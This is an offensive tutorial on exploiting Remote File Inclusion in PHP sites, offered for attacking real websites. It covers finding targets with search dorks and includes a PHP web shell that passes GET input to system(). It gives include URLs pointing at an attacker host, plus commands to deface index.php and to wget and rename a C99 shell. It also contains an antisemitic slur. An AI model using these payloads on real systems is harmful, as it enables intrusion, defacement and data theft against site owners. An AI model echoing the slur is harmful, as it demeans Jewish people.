Remote File Inclusion (RFI) – Tutorial

What is RFI ?

RFI stands for Remote File Inclusion, examples of RFI is the bloated “C99″ script.As good as this script is, its not practical its too big and fills the access logs like a jew. Its highly noticeable.

What is the point in it?

Contrary to popular belief, not all website is hacking is SQL  RFI is great because you can get access too and edit all files on the server it makes defacements and stealing classified material as easy as … wget?

What do I need to be able to do this?

Well basically, a web browser, a simple PHP RFI Script (Will teach you a simple one) and some basic knowledge of BASH (Most servers are linux/unix so you might need this .

Lets go

Okay! So, to start with we need a vulnerable site… How do you find these? Well a g00gle d0rk can help you … Alot. RFI’s work by tricking the server into downloading and executing code thats not actually on it, say a website was

http://shittysite.com/index.php?page=about

This could be a site that pulls in .txt documents to display as pages, very very insecure yet people still do it. Anyway, this either uses the PHP include function we can exploit this… How?

http://shittysite.com/index.php?page=http://evilsite.com/ourscript.txt

Now this could work, it could work quite well. If the site is vulnerable something would happen but I will get into what in a minute.

So, you might of noticed that I added the .txt extension, this might not work as the ?page=about had no .txt extension. This could be because the script automatically appends the .txt file extension (the error you will get is something about it not being able to include ourscript.txt.txt), now as it is appending .txt we can just put ourscript and it will still work, however if it auto-appends something along the lines of .php then we have to use a null byte which is .

Okay, so what do we actually put into ourscript.txt before we do this? Well it could be something like the C99, but unless that script is uploaded instead of included you will get a ton of errors and none of the features will work so instead we have to build our own little script to get this baby working.

Code :

<?php

echo "<script>alert(1337);</script>";
echo "Executing command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);

?>

Something like that will work, as we can send a command to the linux/unix server in bash as well as testing if its RFI vulnerable with the alert box.
Ok, so if it worked we are in luck as we can now send a few commands to the server.
To start with lets try and list all the documents in the current directory. Anyone who knows any bash will know that the list command is ls not dir.

So we do:

http//shittysite.com/index.php?cmd=ls&page=http://evilsite.com/ourscript

That then sends the cmd that we put into our script, and starts to list the documents… This is great! Now we can do anything now, anything at all we can deface the current page using something as simple as

cmd=echo This site got pwn3d by hacker > index.php

That will re-write the index.php and pwn it (Or in the case of a website with .txt extensions you will want to put this into one of the .txt files)
We can download, remove, rename, anything! But that means you need to know some bash. In case you don’t, not all is lost! You can use the ‘wget’ function to download a c99 script.

Ok so how do we do that?

cmd=wget http://evilsite.com/c99.txt

now as a .txt the script is going to be useless, well we could use some LFI but we aren’t going to we are just going to rename it!

mv

Simples..

cmd=mv c99.txt hacked.php

Now by just going to hacked.php the C99 will work and the site can be pwned that way.

This is just a simple tutorial, not too advanced. Its meant to give an overview of RFI, not a complete guide